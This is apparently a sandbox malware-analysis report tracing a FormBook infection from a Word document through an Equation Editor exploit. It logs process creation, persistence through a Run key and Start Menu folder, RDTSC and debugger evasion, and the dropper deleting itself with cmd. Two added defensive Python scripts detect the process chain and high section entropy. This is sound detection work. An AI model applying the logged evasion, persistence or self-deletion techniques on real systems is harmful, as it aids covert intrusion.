Source: 16.2.firefos.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 16.2.firefos.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 15.2.firefos.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 15.2.firefos.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 15.2.firefos.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 15.2.firefos.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 16.2.firefos.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 16.2.firefos.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 6.2.skypound83892.exe.400000.1.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 6.2.skypound83892.exe.400000.1.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 6.2.skypound83892.exe.400000.1.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 6.2.skypound83892.exe.400000.1.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: skypoundx[1].exe.2.dr | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: skypound83892.exe.2.dr | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: firefos.exe.4.dr | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: explorer.exe, 00000007.00000000.2144811362.0000000003C40000.00000002.00000001.sdmp | Binary or memory string: .VBPud<_
Source: classification engine | Classification label: mal100.troj.expl.evad.winDOC@18/9@6/4
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File created: C:\Users\user\Desktop\~$MAXTRADING.doc
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File created: C:\Users\user\AppData\Local\Temp\CVRCD2D.tmp
Source: C:\Users\user\AppData\Roaming\skypound83892.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File read: C:\Users\desktop.ini
Source: C:\Users\user\AppData\Roaming\skypound83892.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\explorer.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: VOMAXTRADING.doc | Virustotal: Detection: 43%
Source: VOMAXTRADING.doc | ReversingLabs: Detection: 39%
Source: unknown | Process created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
Source: unknown | Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Source: unknown | Process created: C:\Users\user\AppData\Roaming\skypound83892.exe C:\Users\user\AppData\Roaming\skypound83892.exe
Source: unknown | Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Source: unknown | Process created: C:\Users\user\AppData\Roaming\skypound83892.exe C:\Users\user\AppData\Roaming\skypound83892.exe
Source: unknown | Process created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exe 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exe'
Source: unknown | Process created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exe 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exe'
Source: unknown | Process created: C:\Windows\SysWOW64\NAPSTAT.EXE C:\Windows\SysWOW64\NAPSTAT.EXE
Source: unknown | Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\AppData\Roaming\skypound83892.exe'
Source: unknown | Process created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exe C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exe
Source: unknown | Process created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exe C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Process created: C:\Users\user\AppData\Roaming\skypound83892.exe C:\Users\user\AppData\Roaming\skypound83892.exe
Source: C:\Users\user\AppData\Roaming\skypound83892.exe | Process created: C:\Users\user\AppData\Roaming\skypound83892.exe C:\Users\user\AppData\Roaming\skypound83892.exe
Source: C:\Windows\explorer.exe | Process created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exe 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exe'
Source: C:\Windows\explorer.exe | Process created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exe 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exe'
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exe | Process created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exe C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exe
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exe | Process created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exe C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exe
Source: C:\Windows\SysWOW64\NAPSTAT.EXE | Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\AppData\Roaming\skypound83892.exe'
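The process chain above is the part of this report that maps most directly onto endpoint detection: Equation Editor (EQNEDT32.EXE) starts a dropper from AppData\Roaming, the dropper relaunches itself (the suspended-process hollowing the signatures flag), firefos.exe runs from a Start Menu\Programs folder, and NAPSTAT.EXE, a SysWOW64 binary now hosting the injected FormBook code, uses cmd.exe to delete the original dropper. The Python below is an added example and is not part of the sandbox report or its signature engine. It rebuilds the report's process-creation records as constructed dictionaries (the keys parent, image and cmdline are an assumption, loosely modelled on Sysmon Event ID 1) and runs four behaviour-based rules over them. The rules deliberately key on parent/child relationships and locations rather than on the file names skypound83892.exe and firefos.exe, so a renamed dropper still trips them.

```python
"""Process-tree rules for the Equation Editor -> FormBook chain in this report.

Added example, not part of the sandbox report. The records in EVENTS are
constructed from the report's "Process created" lines; the keys parent,
image and cmdline are an assumption loosely modelled on Sysmon Event ID 1.
"""
import ntpath
import re
from typing import Callable, Dict, List, Tuple

Event = Dict[str, str]
Finding = Tuple[str, str]

# Constructed from the report; "unknown" is kept where the sandbox could not
# attribute a parent (COM-launched Office processes, the injected NAPSTAT.EXE).
EVENTS: List[Event] = [
    {"parent": "unknown",
     "image": r"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE",
     "cmdline": r"'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding"},
    {"parent": "unknown",
     "image": r"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE",
     "cmdline": r"'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding"},
    {"parent": r"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE",
     "image": r"C:\Users\user\AppData\Roaming\skypound83892.exe",
     "cmdline": r"C:\Users\user\AppData\Roaming\skypound83892.exe"},
    {"parent": r"C:\Users\user\AppData\Roaming\skypound83892.exe",
     "image": r"C:\Users\user\AppData\Roaming\skypound83892.exe",
     "cmdline": r"C:\Users\user\AppData\Roaming\skypound83892.exe"},
    {"parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exe",
     "cmdline": r"'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exe'"},
    {"parent": r"C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exe",
     "image": r"C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exe",
     "cmdline": r"C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exe"},
    {"parent": "unknown",
     "image": r"C:\Windows\SysWOW64\NAPSTAT.EXE",
     "cmdline": r"C:\Windows\SysWOW64\NAPSTAT.EXE"},
    {"parent": r"C:\Windows\SysWOW64\NAPSTAT.EXE",
     "image": r"C:\Windows\SysWOW64\cmd.exe",
     "cmdline": r"/c del 'C:\Users\user\AppData\Roaming\skypound83892.exe'"},
]


def _name(path: str) -> str:
    """Lower-cased file name; ntpath parses Windows paths on any host OS."""
    return ntpath.basename(path).lower()


def _under_appdata(path: str) -> bool:
    return "\\appdata\\" in path.lower()


def eqnedt32_spawns_child(ev: Event) -> bool:
    """Equation Editor renders OLE objects and never needs a child process;
    any child is the CVE-2017-11882 / CVE-2018-0802 exploitation pattern."""
    return _name(ev["parent"]) == "eqnedt32.exe"


def appdata_binary_respawns_itself(ev: Event) -> bool:
    """A binary under AppData starting a second copy of itself is the
    create-suspended-then-hollow pattern the report flags for both droppers."""
    return _under_appdata(ev["image"]) and _name(ev["image"]) == _name(ev["parent"])


def exec_from_start_menu_programs(ev: Event) -> bool:
    """Start Menu\\Programs holds shortcuts, not executables; a PE running
    from there is a persistence location (firefos.exe is also in HKCU Run)."""
    return "\\start menu\\programs\\" in ev["image"].lower()


_DEL_RE = re.compile(r"/c\s+del\s+['\"]?([^'\"]+)", re.IGNORECASE)


def system_binary_deletes_appdata_file(ev: Event) -> bool:
    """A System32/SysWOW64 binary running cmd /c del on a file under AppData:
    the injected payload removing the dropper it came from."""
    if _name(ev["image"]) != "cmd.exe":
        return False
    if not ntpath.dirname(ev["parent"]).lower().endswith(("\\system32", "\\syswow64")):
        return False
    m = _DEL_RE.search(ev["cmdline"])
    return m is not None and _under_appdata(m.group(1))


RULES: List[Tuple[str, Callable[[Event], bool]]] = [
    ("eqnedt32_spawns_child", eqnedt32_spawns_child),
    ("appdata_binary_respawns_itself", appdata_binary_respawns_itself),
    ("exec_from_start_menu_programs", exec_from_start_menu_programs),
    ("system_binary_deletes_appdata_file", system_binary_deletes_appdata_file),
]


def scan(events: List[Event]) -> List[Finding]:
    """Return (rule name, image) for every rule that fires on every event."""
    return [(name, ev["image"]) for ev in events for name, rule in RULES if rule(ev)]


if __name__ == "__main__":
    for rule_name, image in scan(EVENTS):
        print(f"{rule_name:36s} {image}")
```

Against the constructed records the scan yields six findings: one for the Equation Editor child, two self-respawns (skypound83892.exe and firefos.exe), two executions from Start Menu\Programs, and one for the NAPSTAT.EXE-driven deletion. The first rule alone is enough to catch this class of document on a patched-but-not-hardened host, since a legitimate EQNEDT32.EXE has no reason to create processes at all.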
Source: C:\Windows\explorer.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{00BB2765-6A77-11D0-A535-00C04FD7D062}\InProcServer32
Source: Window Recorder | Window detected: More than 3 window changes detected
Source: C:\Users\user\AppData\Roaming\skypound83892.exe | File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
Source: VOMAXTRADING.doc | Static file information: File size 1677719 > 1048576
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: Binary string: wntdll.pdb source: firefos.exe
Source: Binary string: napstat.pdb source: skypound83892.exe, 00000006.00000002.2203275635.0000000000430000.00000040.00000001.sdmp
Source: C:\Users\user\AppData\Roaming\skypound83892.exe | Code function: 6_2_0041B3B5 push eax; ret
Source: C:\Users\user\AppData\Roaming\skypound83892.exe | Code function: 6_2_0041B46C push eax; ret
Source: C:\Users\user\AppData\Roaming\skypound83892.exe | Code function: 6_2_0041B402 push eax; ret
Source: C:\Users\user\AppData\Roaming\skypound83892.exe | Code function: 6_2_0041B40B push eax; ret
Source: C:\Users\user\AppData\Roaming\skypound83892.exe | Code function: 6_2_0094DFA1 push ecx; ret
Source: C:\Windows\SysWOW64\NAPSTAT.EXE | Code function: 12_2_0214DFA1 push ecx; ret
Source: C:\Windows\SysWOW64\NAPSTAT.EXE | Code function: 12_2_0013B3B5 push eax; ret
Source: C:\Windows\SysWOW64\NAPSTAT.EXE | Code function: 12_2_0013B402 push eax; ret
Source: C:\Windows\SysWOW64\NAPSTAT.EXE | Code function: 12_2_0013B40B push eax; ret
Source: C:\Windows\SysWOW64\NAPSTAT.EXE | Code function: 12_2_0013B46C push eax; ret
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exe | Code function: 15_2_0041B3B5 push eax; ret
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exe | Code function: 15_2_0041B46C push eax; ret
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exe | Code function: 15_2_0041B402 push eax; ret
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exe | Code function: 15_2_0041B40B push eax; ret
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exe | Code function: 15_2_0094DFA1 push ecx; ret
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exe | Code function: 16_2_008BDFA1 push ecx; ret
          Source: initial sampleStatic PE information: section name: .text entropy: 7.97370301044
          Source: initial sampleStatic PE information: section name: .text entropy: 7.97370301044
          Source: initial sampleStatic PE information: section name: .text entropy: 7.97370301044
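The three entropy lines above are one check applied to the three dropped copies of the same payload: a .text section at 7.97 bits per byte is close to the 8.0 maximum, which plain compiled code never reaches and which points to a packed or encrypted body that is only unwrapped in memory (consistent with the Yara hits landing on unpacked memory regions rather than on the files). The following Python is an added example, not the sandbox's own code: it walks the PE section table by hand and reports Shannon entropy per section. The PE it scans is a constructed, non-executable stub assembled by build_test_pe() so the script runs offline; the 7.0 alert threshold is a common rule of thumb and an assumption here, not a value from the report; scan_file() applies the same check to a real file.

```python
"""Per-section Shannon entropy of a PE image, the check behind the report's
".text entropy: 7.97" finding. Added example, not the sandbox's own code.
build_test_pe() assembles a constructed, non-executable stub so the parser
can be exercised offline; the 7.0 threshold is an assumption (rule of thumb).
"""
import math
import random
import struct
from typing import Dict, List, Tuple


def shannon_entropy(data: bytes) -> float:
    """Bits per byte: 0.0 for empty input, 8.0 for a uniform byte distribution."""
    if not data:
        return 0.0
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in counts if c)


def pe_sections(image: bytes) -> List[Tuple[str, bytes]]:
    """Walk DOS header -> PE signature -> COFF header -> section table and
    return (name, raw bytes) per section; raises ValueError on a non-PE."""
    if image[:2] != b"MZ":
        raise ValueError("missing MZ signature")
    e_lfanew = struct.unpack_from("<I", image, 0x3C)[0]
    if image[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    coff = e_lfanew + 4                                   # IMAGE_FILE_HEADER
    num_sections = struct.unpack_from("<H", image, coff + 2)[0]
    opt_size = struct.unpack_from("<H", image, coff + 16)[0]
    table = coff + 20 + opt_size                          # first IMAGE_SECTION_HEADER
    sections = []
    for i in range(num_sections):
        name, _vsize, _va, raw_size, raw_ptr = struct.unpack_from(
            "<8sIIII", image, table + 40 * i)
        sections.append((name.rstrip(b"\0").decode("ascii", "replace"),
                         image[raw_ptr:raw_ptr + raw_size]))
    return sections


def packed_sections(image: bytes, threshold: float = 7.0) -> Dict[str, float]:
    """Sections whose entropy reaches the threshold, as {name: entropy}."""
    result = {}
    for name, data in pe_sections(image):
        h = shannon_entropy(data)
        if h >= threshold:
            result[name] = round(h, 3)
    return result


def scan_file(path: str, threshold: float = 7.0) -> Dict[str, float]:
    """Apply the same check to a real file on disk."""
    with open(path, "rb") as f:
        return packed_sections(f.read(), threshold)


def build_test_pe(sections: List[Tuple[bytes, bytes]]) -> bytes:
    """Constructed minimal PE: DOS header pointing at 0x40, PE signature,
    COFF header with an empty optional header, section table, raw data."""
    dos = b"MZ" + b"\0" * (0x3C - 2) + struct.pack("<I", 0x40)
    coff = struct.pack("<HHIIIHH", 0x14C, len(sections), 0, 0, 0, 0, 0x0102)
    raw_ptr = 0x40 + 4 + 20 + 40 * len(sections)          # data follows the headers
    table, raw = b"", b""
    for name, data in sections:
        table += struct.pack("<8sIIIIIIHHI", name.ljust(8, b"\0"), len(data),
                             0x1000, len(data), raw_ptr, 0, 0, 0, 0, 0x60000020)
        raw += data
        raw_ptr += len(data)
    return dos + b"PE\0\0" + coff + table + raw


# Constructed section contents: a seeded PRNG stands in for packed code,
# the other two sections hold ordinary text and a repetitive pattern.
_rng = random.Random(20201123)
SAMPLE_SECTIONS: List[Tuple[bytes, bytes]] = [
    (b".text", bytes(_rng.getrandbits(8) for _ in range(4096))),
    (b".rdata", b"This is ordinary readable data, not packed. " * 64),
    (b".data", b"ABCD" * 256),
]


if __name__ == "__main__":
    img = build_test_pe(SAMPLE_SECTIONS)
    for name, data in pe_sections(img):
        print(f"{name:8s} {len(data):6d} bytes  entropy {shannon_entropy(data):.3f}")
    print("above threshold:", packed_sections(img))
```

On the constructed stub only .text crosses the threshold; .data comes out at exactly 2.0 bits (four equiprobable byte values) and the text section well under 5. A high-entropy executable section is not proof of malice on its own (legitimately packed installers and some protectors produce the same numbers), which is why the report pairs this static hint with the in-memory Yara matches on the unpacked image.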
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\skypoundx[1].exe
          Source: C:\Users\user\AppData\Roaming\skypound83892.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exe
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | File created: C:\Users\user\AppData\Roaming\skypound83892.exe
          Source: C:\Users\user\AppData\Roaming\skypound83892.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe
          Source: C:\Users\user\AppData\Roaming\skypound83892.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exe
          Source: C:\Users\user\AppData\Roaming\skypound83892.exe | Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run firefos
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\skypound83892.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\explorer.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\NAPSTAT.EXE | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

          Malware Analysis System Evasion:

          Tries to detect virtualization through RDTSC time measurements
          Source: C:\Users\user\AppData\Roaming\skypound83892.exe | RDTSC instruction interceptor: First address: 00000000004085E4 second address: 00000000004085EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\AppData\Roaming\skypound83892.exe | RDTSC instruction interceptor: First address: 000000000040897E second address: 0000000000408984 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\NAPSTAT.EXE | RDTSC instruction interceptor: First address: 00000000001285E4 second address: 00000000001285EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\NAPSTAT.EXE | RDTSC instruction interceptor: First address: 000000000012897E second address: 0000000000128984 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exe | RDTSC instruction interceptor: First address: 00000000004085E4 second address: 00000000004085EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exe | RDTSC instruction interceptor: First address: 000000000040897E second address: 0000000000408984 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\AppData\Roaming\skypound83892.exe | Code function: 6_2_004088B0 rdtsc
          Source: C:\Users\user\AppData\Roaming\skypound83892.exe | Thread delayed: delay time: 922337203685477
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exe | Thread delayed: delay time: 922337203685477
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 1296 | Thread sleep time: -240000s >= -30000s
          Source: C:\Users\user\AppData\Roaming\skypound83892.exe TID: 2308 | Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2692 | Thread sleep time: -120000s >= -30000s
          Source: C:\Windows\explorer.exe TID: 2820 | Thread sleep time: -30000s >= -30000s
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exe TID: 2960 | Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exe TID: 2252 | Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Windows\SysWOW64\NAPSTAT.EXE TID: 2496 | Thread sleep time: -30000s >= -30000s
          Source: C:\Windows\SysWOW64\NAPSTAT.EXE | Last function: Thread delayed
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exe | File opened: C:\Users\user\AppData\
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exe | File opened: C:\Users\user\
          Source: explorer.exe, 00000007.00000000.2137451244.00000000001F5000.00000004.00000020.sdmp | Binary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000007.00000000.2148237978.0000000004234000.00000004.00000001.sdmp | Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\5&22BE343F&0&000000
          Source: explorer.exe, 00000007.00000000.2148310732.0000000004263000.00000004.00000001.sdmp | Binary or memory string: \\?\ide#cdromnecvmwar_vmware_sata_cd01_______________1.00____#6&373888b8&0&1.0.0#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}ies
          Source: explorer.exe, 00000007.00000000.2148237978.0000000004234000.00000004.00000001.sdmp | Binary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0
          Source: explorer.exe, 00000007.00000000.2137478311.0000000000231000.00000004.00000020.sdmp | Binary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0&E}
          Source: C:\Users\user\AppData\Roaming\skypound83892.exe | Process information queried: ProcessInformation
          Source: C:\Users\user\AppData\Roaming\skypound83892.exe | Process queried: DebugPort
          Source: C:\Windows\SysWOW64\NAPSTAT.EXE | Process queried: DebugPort
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exe | Process queried: DebugPort
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exe | Process queried: DebugPort
          Source: C:\Users\user\AppData\Roaming\skypound83892.exe | Code function: 6_2_004088B0 rdtsc
          Source: C:\Users\user\AppData\Roaming\skypound83892.exe | Code function: 6_2_00409B20 LdrLoadDll,
